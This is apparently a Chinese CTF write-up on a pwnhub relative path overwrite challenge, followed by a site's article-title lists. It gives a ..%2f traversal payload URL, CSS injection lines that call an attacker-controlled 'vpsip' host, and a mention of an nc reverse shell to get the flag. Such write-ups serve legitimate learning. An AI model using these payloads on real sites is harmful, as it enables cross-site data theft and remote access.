pwnhub 相对路径覆盖
2024-08-31 18:09:09
这个pwnhub小m师傅的题,做的时候完全没有思路。
首先是注册然后可以看到一个加载css的地方,是相对路径加载(当然我并没有觉得有什么问题)。
服务端和浏览器解析URL是有区别的,就是%2f
服务器吧%2f解析成/ 比如:http://domain/1%2f2.php,我们访问这个,服务器会解析成http://domain/1/2.php,而浏览器会把1%2f2.php当成一个文件
知道这点过后我们来看看payload:http://52.80.19.55/user.php/510/a/b/..%2f..%2f..%2f..%2fclasses.php
服务器把%2f当成/所以就变成了http://52.80.19.55/user.php/510/a/b/../../../../classes.php网上跳4级目录就是/classes.php
而浏览器把这个..%2f..%2f..%2f..%2fclasses.php当成一个目录,在加载这个目录下面的css的时候就变成了http://52.80.19.55/user.php/510/a/b/..%2f..%2f..%2f..%2fclasses.php../../classes.css网上跳两级目录就成了在user.php下面加载css而这个css里面的<p>写入了页面就是用户注册时提交的viow
,提交时提交自己的vps:*{}*{background-image:url('http://vpsip');}*{}或者{}import url('http://vpsip')
然后通过bugreporter 提交payload nc反弹就可以得到flag;
第一次遇到这个东西所以想记录下来
最新文章
- 你知道C#中的Lambda表达式的演化过程吗?
- Spring框架总结
- BaseServlet
- Redis几个认识误区(转)
- oracle 字段上下两条记录的相减
- MonkeyRunner于Windows在下面Eclipse开发环境的搭建步骤(并解决在线Jython配置错误的问题)
- delphi edit编辑框使用
- 手机自动化测试:appium源码分析之bootstrap五
- SQL 2005/2008 连接SQL 2000报18456错误
- JDBC原理
- Linux 第十二天
- 万恶之源 - Python生成器
- PAT 甲级 1022 Digital Library
- Crystal Report Error: Either the Crystal Reports registy key permission are insufficient or the Crystal Reports runtime is not installed correctly
- android 百度地图 No implementation found for int
- 用VSTS进行网站压力测试
- 深入理解 iOS Rendering Process
- Android中开发需要的高效助推的命令总结
- 微信小程序新版用户授权方式处理
- SVM之核函数
热门文章
- SVN版本控制中.a无法提交问题
- MotionEvent分析及ImageView缩放实现
- java中String.valueOf(obj)、(String)obj与obj.toString()有什么区别
- 转载的C#学习笔记
- UVA 11752 The Super Powers —— 数学与幂
- Codeforces Round #105 (Div. 2) E. Porcelain —— DP(背包问题)
- CSU - 1530 Gold Rush —— 二进制
- BZOJ 1620 [Usaco2008 Nov]Time Management 时间管理:贪心
- 【CQ18高一暑假前挑战赛5】标程
- OpenCV在Zedboard上的移植